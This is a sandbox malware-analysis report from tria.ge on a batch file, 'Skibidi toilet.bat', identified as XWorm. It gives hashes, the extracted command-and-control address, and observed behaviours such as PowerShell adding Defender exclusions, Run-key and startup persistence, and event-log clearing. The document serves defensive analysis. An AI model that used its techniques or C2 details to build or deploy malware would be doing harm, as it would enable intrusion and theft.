Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
463s -
max time network
489s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04/10/2024, 06:52
Static task
static1
Behavioral task
behavioral1
Sample
Skibidi toilet.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Skibidi toilet.bat
Resource
win10v2004-20240802-en
Errors
General
-
Target
Skibidi toilet.bat
-
Size
394KB
-
MD5
74b141f7f2a33f196ef5bc80271f9362
-
SHA1
90bc22961bbf9bee09fc9781e09cc07539efdc9f
-
SHA256
d045a5c4b8dde317db30177b67e8dbda3f96fe3932511da4b48c9727ee4300bb
-
SHA512
b0444194e81a206241aa8b33e88fa7b6a1190b9a883e0d2a1348ba0dbb6938774c88a9f7dccb43dcf1b7b78fd1dad21c7e343d6e00e6cc479d509422ab1f4bc0
-
SSDEEP
12288:8yC/peKGA87tHcAoKFaVxligFt7CeTGW4e:R2EKL87cQaRign+e
Malware Config
Extracted
xworm
193.161.193.99:59410
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3168-50-0x000001A627DA0000-0x000001A627DB6000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4064 created 672 4064 psychosomatic.exe 7 -
Blocklisted process makes network request 2 IoCs
flow pid Process 31 3168 powershell.exe 128 3168 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3812 powershell.exe 2080 powershell.exe 2468 powershell.exe 1220 powershell.exe 2860 powershell.exe 4120 powershell.exe 3168 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2116 System User 4064 psychosomatic.exe 3688 psychosomatic.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Loads dropped DLL 3 IoCs
pid Process 3688 psychosomatic.exe 3572 Explorer.EXE 3572 Explorer.EXE -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User" powershell.exe -
Drops desktop.ini file(s) 16 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Searches\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Links\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Music\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini psychosomatic.exe File opened for modification C:\Users\Admin\Videos\desktop.ini psychosomatic.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\W: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 121 raw.githubusercontent.com 120 raw.githubusercontent.com -
Drops file in System32 directory 20 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\System32\LogonUI.exe psychosomatic.exe File opened for modification C:\Windows\system32\SleepStudy\user-not-present-trace-2024-10-04-06-52-49.etl svchost.exe File created C:\Windows\System32\LogonUI.exe psychosomatic.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File created C:\Windows\system32\SleepStudy\user-not-present-trace-2024-10-04-06-52-49.etl svchost.exe File opened for modification C:\Windows\System32\Tasks\System User svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File created C:\Windows\system32\d3dx9_43.dll psychosomatic.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\psychosomaticDLL.dll psychosomatic.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\EventCache.v2\{5C1CAB6B-CED7-49F5-9A7D-5F61C0602B1A}.bin svchost.exe File opened for modification C:\Windows\SoftwareDistribution\EventCache.v2\{75E487C8-1960-4439-A032-4B504CD5DDB1}.bin svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 16 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02epcmluuckdplgd\Reason = "2147780641" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02hchdpugyvbfmyt svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02hchdpugyvbfmyt\DeviceId = "<Data><User username=\"02HCHDPUGYVBFMYT\"><HardwareInfo BoundTime=\"1728024771\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\ValidDeviceId = "02hchdpugyvbfmyt" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133724984349070558" chrome.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\ValidDeviceId svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02epcmluuckdplgd\AppIdList svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02hchdpugyvbfmyt\DeviceId = "<Data><User username=\"02HCHDPUGYVBFMYT\"><HardwareInfo BoundTime=\"1728024772\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2392887640-1187051047-2909758433-1000\02hchdpugyvbfmyt\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00180011D66CC61D" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02epcmluuckdplgd svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02epcmluuckdplgd\Request Friday, October 04, 2024 06:52:51 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaC7xrbbBt0G5piljdbju+wAAAAACAAAAAAAQZgAAAAEAACAAAABn4VyOxbjY7DQGnwQ9KhZnP0CONZMveBT7bOq6kN5CagAAAAAOgAAAAAIAACAAAAClznhV0IYqwExC0ygasxYOYhuBbJIZ+3QAL0STjLSJ17ASAABgcEv2/UPQgpEvUEA6HvnFqp1zremDFtMDjXmLV/xZUp8BDROXJ2cUUaVYc4+EC17WG0lwta+FGQQalIRc78jz49VaTRWnfCFohBg+jDhO761d24kfb8qHbOGBxGbUpQOpHC1uo6T/O8cuuQOKtAi9FPf4Vf2Eot1K6tisY/7/nOUYcywWykwjAeNCcsFio7xxycNdQ49UxCx5F1E33GI4dHXKPZOeV856CJdKeWFluvxNXNmcG+WMHfsE092sRnAeophEmOEUEzqHOBNSlEO3ZT1f4dOpcomjrzo65mvT6tYqwkV4foFIU6RqLsETLEEPecS8CblvZKjLH0JTrLgKSZKsh/LQrO1BKTWMFBowXn6YecrkU+I8LB+7Cf/jB89Rt93jn1TOrH5f7HGfm2YCQ8zPQE5LTk+CDAsBm91v/f8Emszbtu/BQvSWsg9NDDKsizYTm1CzyQuEhgX7nFhp/0w4889r8dO4IihIGMMh63MitZ7yPKhZBvZUYGX5KDXcSiLAvgp2EMkcITgjT0XAWm68Xgq56z+cdTs6Ojw/dJ67upP6jyItfpGuuN4nMjdIGzvqk5ORGRJ5iwKIx+idzo4YzTjmlAdRhey/Np99AWHTg5Q3i3ZrqHOu32n1un3Z21UZDQpB4bl9u6qbD29cHVc1359k0iKfA35Y/tIh+FIx1V5bF36a32beX3l1SjIG9sNvKri05kif+j3mLPHR4xj5nAExx2ZHZ4105ohZJaQI1cmeI5sKjttUUTjhDWxSaM2N9Vws/D2ufeEaParhtuvYE1ffYCwGOaygG0MaSBnSwyml6EoFUC3yFjiTpfHwCbh0X9AaadhAexDCYKtCS4hlPyYW8A7wi/MMcLzZ5b4RmJ6OYYiLewP62lCnDCULy4XFbzWCqcj3wzTTTXhb+2KYdL+npVlBY7ewBPL94143oSubpSKoU4ChiCWxfd6sJBILvNi5Qb5vU3lAkBw37rA14b0oI2Z8hi8Q2FWWK58+Rbe/KSX8J71uvKP+IeMnnUxYLKfdc5HW6RO8FZMCwCADkPuyAyHGzKYWQDkCp9Dbwt5WBhUBDj2x+44i/opCEqQ5Q0jmgxXCPe4r9zPrZ3iDVRDlJz86y/0EkVUz2bJbXdOZnbWrmePdsmXjWwBPGJyzwFB20ayjp2yUKecOjZlL+UagXnfFUMEnDK+zOpzVfwOgeUcQdm3ilYuur5EMGQiebQtWk3od3mSIcH1T3ev4iN48jnyhjJpFB+9/n4Sqm5EpZZpF6V+x8wNE7lrcrUReUlSTYdPjmAG5xQGtXGEkkwE/dazxRBzMHWlF5kKypychZLLXAQP0mGWd9K53lhoRQkoRnjm+CC3uPweoewTC2DZszIym8myxHekPQy89bQpnjn1f1ul+aMmsxdgOv/uykmBRMEGmSNvP0XnOt7hhu4TkxdhmrGKiCcdxGwam8jrUN2oymy6MqlyVEfQQWp0fOhJxq81RcFF1DG/9xCnbXXt7gbOeKGpjW4EvmFriS0LZCTikx8VLdt1l+YSzvQPSNi58fRJPzMz9bLFEmHuoqqErLbo6e1CtfvxWoC3X61E1Qo5HZUVRoXP2lBMmI9LlrcQ/ar1ErYKy4h9LfYTnx77vc9/hMBA4sgxh+8C7ljgNrtqm0UcswaOKpy/DIeB5Qpn0XJ45bK8kXNGGMs0xwtIy2GVtMSaIwUtC+uZsdoGOR8GMGIl16yz6eA0xxGrvHz9f6Dha7cU6ZkdUUuASwnCe2tayHUSuHoB2OaBqBM/LBiQZ4y5xE+81QBB8U7mATElFV3m0c76845V/28DEo8jA8YTmZochTGTtZr5PNs7UlX1MQMLWsTKf0Rr1lWa/zNkK3N8KKtN7bi+uTUvR4FNTxiDmo2w0o9wEKmjhXCyVINwr1OGkbEAxiKsiFJWv4xuVdSwAwggsAdczOQ31ykTXDBYtQE1a3kfUWyiEuzo1S3WSJAitMeX8wY6gKit+7HrO7fHMzjXaoQiR8I+cG/du9WQ2gO62DfQ0t8VWgHILDWA++mB2jF3Go87ZNpB48oKzOthOQufZKgzqZ1v+40QnbAzBor09YOc4g2VWQAXDIVoc/c7HrsvUBLUU1hPMlqzAiRsq0Cku8sogffkiMRY9PsV9YgG63GacsdT9+6kb3USAmhv39eiWBDyIsC/0HCaC0IDtlpkl7GFrR3h2lUdTHc9pzDbh0ksugKQP+yDyxc7yEthqjTD3nnrzkhJT/75rx7t2Vdz+pvsMp3mnV3KrdPE4mPWjU/EFsm6qBs7JdZG9oHxvKD+oJKN9q5gBsAd8Hko72Fq17spBozKDShXhS3X/oj4sRepJojwIKYBq9HJkm5FkOoGmVYhP/wpzbzljB9T67w2r/bkOtsomyNzRZY2mrw+Xi4zokMXerFSgKl9v/0V+Qu/8w1ngNk/WVYwVUurRVuKPKwRkTAidB5ofyFeqIKb6ktmt48rodLXLL/KL/82EnG88arwuSCvFTAZnkje5M14UNTYeL5wtV1Qc5mf+WXB+V0J658VGD8ZW6kZHhMiS6e6i3QQ7BjcoaOicQ2FhNPH4IOPLRfoiiCel/C3FJ779Qp78BGAD3FqOtzETtNND31tbwCSQNNgPDB/AgLjUqWxxFCXmNI6xUeNhzF6Y7ukylo3lVlNvKbaXHKXdJv+CeTO3nlSTRCyvNc0hgl/PVTV4Z2w6qN1JsQ/9VmQq+bfhYNgwoxHjDeEfGbw3z3hldrw9iD7NrjucJ2J8x3+ZY6eUcvWZAlkDwgg0MsOnxVVtQ6hVvEn3Wc/dUUpory/RdyUA7eqsEzraA/vNKQTcxLDvDFefU6W/UxpadTUqaipA/KEuofBYkFuN2GDW7+vMZDh8ZVX9doR21UJlKKQXoeHQY4i+mHtPTqVtEu73m0jW0Y6PBzoo08x2685p18MUdA7VZHmA3zN+ZoHdr2u0/8U6o7Uw/nWzfg8yby6Fg4wRLogy2ThcQcY87UWxJUayqcAM1qGKyzObWXcMj0+hSbTOZGoNoiAOVPklIKC90YD45bmJOsXEVq+pep3P5trYIXAAJKJqCNBR79qv3kUYU0FrhOYo61/YplOqlPkYssu1qJrWMnOMR1WP/7lpdBJBwn198K6MdS5QaYWZ7JvkzlS9QAVoJJYIGe/jKuAeqxLOGFxXi0qstz4L6WGqzHtBMvyQpaAGdP4NAwheJs2+27uJGkWIVYWM1+0c6KHGeqJFtQIRVfSuWlxH61H3sqapEFy1/OKCBUeB5qlb2i4TeOCNWw7MTjNetAF38whA3tgRMJQtw8z+Z3v7QEB0yusDLoyksdCCUItb5h95Sz+0fDV3oUDT8Jap15jYFAOCZTfrP61XikI7BG58OZU5I+1zIyU6lFDgm8IX/H3SCCdTeXAi7+gsgluxgvRSdNu1fC3gf8RNINcMNiPMIse8ik3Vvh4wiL41ORu4dokO6bbH/C6B0II9uT76g98aarU2h/4XiBu6Vc5Vu6hr6vTvYo4qWM9R29sQdVbfoy34B8B+TklEtK28NbXuIWZXFnQ2I/ZIUzpQ0U6l6WKYpjxdeBZS5l4Ioqq/8WAgQRmxg2OaA8rQwdXfnsPXK1Te5fhe7X4EtB5aFkjcLWSJgC/48GTtuOSMQ6dybwH1Xc18wdL9cD1ENGkReK3vgiMRSQB9Oj6TmLaKToHn1/KCjQcnP7k/1QVc6LbBNvCCVlB/+DaC7Xx5MIiwBPv9AspRoj3PtCBT1n8RwZZdkgh2Cnzhcf4N4Kb8yX6myT8Xka9LydJf2DYDaAkgz8a9NJf0hWWLmRNX99IeUfzJj2JHqVirS7p8n6/9oT0ALr3GpY+nep62ORgA/ICrY9bpNRdz19erwjj/ffZ2t2IsGPAaWA6cMdT5yyClvf7UlX2KLFmG1PFbWt2LbXa79U4KmF3O6bX3qYevxNZ1iR2boJ/wJnYXnn4u0i9c8T3b6tjnirnYdh0TEERixlMvStV9BJUL2EQUYxqvTif3qoClXY0OX9HcHF7ZOhXCPREQID7LusZFoTbr9GhT59C0IL9M4lfVe1iE36/r7+01IxWrbwQjK0mbSPcwNVZi84VZ/YcXOPAwG8/rFCu9syV7XdhNGSSILeeEgoYHkcMIJEe55uTXNS/yr79JtmDeIrqNmNT7cRgHF7mzS6VE6qPSHEkwFBJZcs8+Vy2LxT3eoGJmdQ832L0CvX8prVcX+wAuisPraLocQPyudX7ILXG1FSsu7Tf+HpyeQmyNceldLxGaeceeyEcP6UzBJ/L2NZZx6U2InPSR3Z/AtefFduA0vwLshtpIDc5YUruBxHDxVLnJ6pvHmqzcjrLMSpkzxZsEqcL4QsB8sBgQYz8yulmYz8VD9wprcDu6fmXLvJFsFQzourWKeCIc2dW6PNyEJXGTyp4VnMBln7bEfe45GM4IvAr3kgSV5DpZzgJMk66bCCdJZwZqCqd0xCUG7F/z2S6+SsNxtL3IAZ3yuG8H4gyQfudQTVqZyydRAHIwWg1netU1ZrVLHDjO8I0VQmDZSmvnzzTPOBx33B9FcehyxgvZ2ltnlBIzMD5Ic2jMXnG+LzUc3pC8giLXxBfHgbTzAli85KE8YugcyrwDeN4KbOzbZCEySkhjKCT9tniKSa/LUBHki3G9djVyA92QwaIoUFSUgTq7APV/hRgFQIDUjNSNCyObLsrWXNvsx2rR0ZTmAHv3Euhf4EReoIKSFt8vRAq99e/wmP7Lswohkc7R03RAPosR+ZwBGC/HTzf0YOrHIJ00mW0u+owiB6Zjw84F6ix46uk10nGpiAPI+Ulaimdqsd7cjTOCxsPeXXKW+yVVnTdsRN9sJi2B+IRiZ9Q28CT3WkKWzgeUsfKRAvxmO7fmOQoBE8FUKBIWc0+Nnzn72j6LNsPXyDqF0/9TvWJYl7Qv8PozxUAQmT0FPgl3k/q+Ee7pcuXsAtV+b0uasznOCL6nsefwPd5pjkSuKZKc3lH0R8+O8k3eH033obbyluRsNNjzVWfPH8dSYD/8j4eLvrn4DO0W1QCA2O8FVqizhADxOwqp3vqkQm8r2OMAF6PYpH2FYes6Rl46J4JBPgQZdOxagYzN/VIAOliKA8BaUvh7H7YmNPOLJiKobPDmtQKtM9abRzoDz5vO5xi0qWGHQaPtibmTkAyI6NCHP1Y82cLyib00zzyr0MJrlVT8AaY0vPklRqYcfuJS6mFez4IHrqXphwcPK8rBh2p8d6nYdOdOqhnIC4AplQQ8G8dAgJERO8yJOViAkaps3+4q4+T2jDbNd5xlIbBOg4cAydwCFhf7R+7MMa4bK59X0WceAASGHTYT9+GD2OtSTiFvr1fNlREI43/ddN8w8xa1cQe9NbeVBXOjVrVrj2N0HpLn5ML7PvlsxoiefiGBWCeM0JNrfWIXegToLpaPjJBY4zASuPeQhOiOkuypCZxzghyfUcxAIDWiSZqVqEPhu7uulYH4DAFeFbKgbnTLoYEfPiLEYoBL0orDvoP3S0FVa2mHjp9ONVpRn1i3COYH7ng0VQREP6OD0Fl/5jaXyuAOUVWEF2Vtidrf0Yv/IwhBENkvi8OL7pwOBUcseIoqDDx3iBtuIYoJL3tbq1VxOnqqikQej/rAul8sjsT8wCkh+N6Ry8Gy4lbvrciHiLJ+i7RpK/sd7p1M5A+DBUagyAlFht3SrviT7so7aJDYGSX9EMtEwNNmpNLmynPhfrhGBsb4qfX9FXUG2+ZMLvPniDOchSkJm2JnPG3VIfC4CyqwR5cg25CtMz9s+WI52NY9/tk4LD4vOGLAMv5Wg/lOR3CA0nUrV8h0k6QzBTNZkTlo5Ru4pBYogewc+rOSNVDvb4v1cGUS0QbDCopakz9U+W1Mz2mvT/9j7Z+ZNL6GK51KIU4slBDHkvSh38s0yiESLrqGufHSJZZArqBrSqLlx43c/1D8D7ftEC7GEvJCnrGTzppTUVCXLkxJceorP9jqOYlHDZu1iU/ArW9+lCfw0ft0UZ+YSNkzO021MEgo0guMcYFoaerytLvL1hmWDKV95Fuxvo9YvSOZiXPpAIm6D3knJPILWuZ9D8+UsZSITPLhDV+rfxCL6Jwsj9CB1LaJvXoX0gI8q471H67OlsiOCPxkL0NKSovjQ4379iimxn9mEJQTEvUGnABQn773cJXvrQuonjkx2epR4L6f/w+SX+czObkLyBn8iPGIqYD8zRUdb0gCVschrvZUy62GtHn0wbfMOe5h4e40LspBJDerV9Udn/B3E+mlds0rOQK7ojPCn4koG3FYgM81S4iv9pYLOmyqraap6vrSprIIyYv8v/34I0hoVw1NFOasETPJnJ/2mR8KDpFotB40f1h9QKdG1kiXnS9DAkAAAADiwD4/UkLhGLBzqUcpUAGa5wIQ7TasVZOvz2vMsXS7cynLpoomMX6SzNEs3v6F/PDP9KICQOZeJahQ/TlYJOQv" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02epcmluuckdplgd\Response Friday, October 04, 2024 06:52:51 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaC7xrbbBt0G5piljdbju+wAAAAACAAAAAAAQZgAAAAEAACAAAAD0bpIH108I34dmSA2b9kN4tfV3Ttx2IS4wi7a9tfRwAgAAAAAOgAAAAAIAACAAAACGQZcUgX00cix+o4R2NGzqVokjDwwTLfY+2cPNyEAkwIAHAAC7ePN+rYnUK1A0IY5NnjMZzOYaid9SDvt+LHUD0n80VA7Yjt/DVd7ju5ssl4/sD2+QlrPSGfdhFNfhSgTShehbT0RAJIDV2W61vRr8PmSs4eAO9DQWfUMrzV3pbsiAgp67nr1PVOgJ40rtWCtRy3AO9fjjh7ElrgRP6gtJMfSOGMfONkPDFhfrD4XuVERZMohzPY8otTZIYyXfsyhIgMcG7WgAQm53vyOcFb8cp3/GNuZ2rSCqtbTTKTAzw2BB9IkmuQkOZqVHaLONDVsHkjZosBqi8y3Iq3zRj7j6tZxKJhQ1HTA39eEPVGTOv8dghQkJdgOpgIUui/koAhPAAc/RoIuuGFXrF6gTc+6WIveud80h5IGutTv+9Q1jfd+mYWYLkZlt/5cVWv0In5chTAbNKItGwBDDhYZPRxeB/xcReyD613xByEl6h5dMYtsgbRgLvj8yKEQtAJ8Pofew9A7o2EXzMHuy6gX4/difxQkfgWs8jIimtK6JkJvmqWe3h9Fi4WYkPU2YVoaYCftbI/zQP9tn0S6f/tXZbwBgbIGi+9f428m+UwgKOwxNmy5JbmDfpXDrHuJESEPaTXLOm7pcnaMwByMTLBb/KFwH0dUoKja6brFrjVsHViXQL6ecRoauuguN7tEkcwTTSJUoc8+osPMQviDNpUYqxAmCQExpOmQlKuRRMoQNVYsU0sGnMJ2LqL/TuD3AzJ9OAxWGXkUc12PR1O2K9pAleH16ya4KUzW6JAdPLpDz1MmN1hCNUERH0c3LNJxXRsZS+Fnlu7d+uIM6+u6PFLBQzT79OGxuOHuS4v7X4h4O8j3HgL20ctGizMT0bR/h3rfce6OIeNbhk9S2yT7baHTH8NhPUJkufBsseQZXW5m5/jOhnuU2SCtcuxiNw2h7PR/8PdBVkTFPpqlqJAArMZDF1VzByxv0hHJiv0u4zmYtFUoodplogXv75LZyUP5p6oD9Xh7vSguTUc7fUel3mZgFbr6sQcutqcXA3zQmIJTKpSX53XiLzm5J1kWyHa43e/EFhtz1cgMCGIJR5nrVOb119khrRN++dMK/t/xL9GdcUujmAwNx831HEIkqMnMucRczjHTdp/1x3ATStH4/445trAtcCpTGlaPIMWc+01hflDZMROdhOVJV1/n636vkXTO9fbIRdAkvVnG8jubxO9F4nZywJnFTFhHE/T24/RRTzOX69/ky7iv9Ku3d5Q89mbeXVvjulQZKti9kE8rNzqfNGylhHezuc3E2ZLPptvJfolmDKO+htvXM67S1XoMXUHQYEOSVlW6x2lysgSpnN64h7Ws8jHDtbRH7IxWmuMqdBTvmcZso02yNPMSooXRI1SHEYPyKC/V8ImK4ZHL6vYiLc4I/xRtWEoXp81O9FztTu13i7XpUePveQF4s8xDTiuBwOaD9Bp8NTae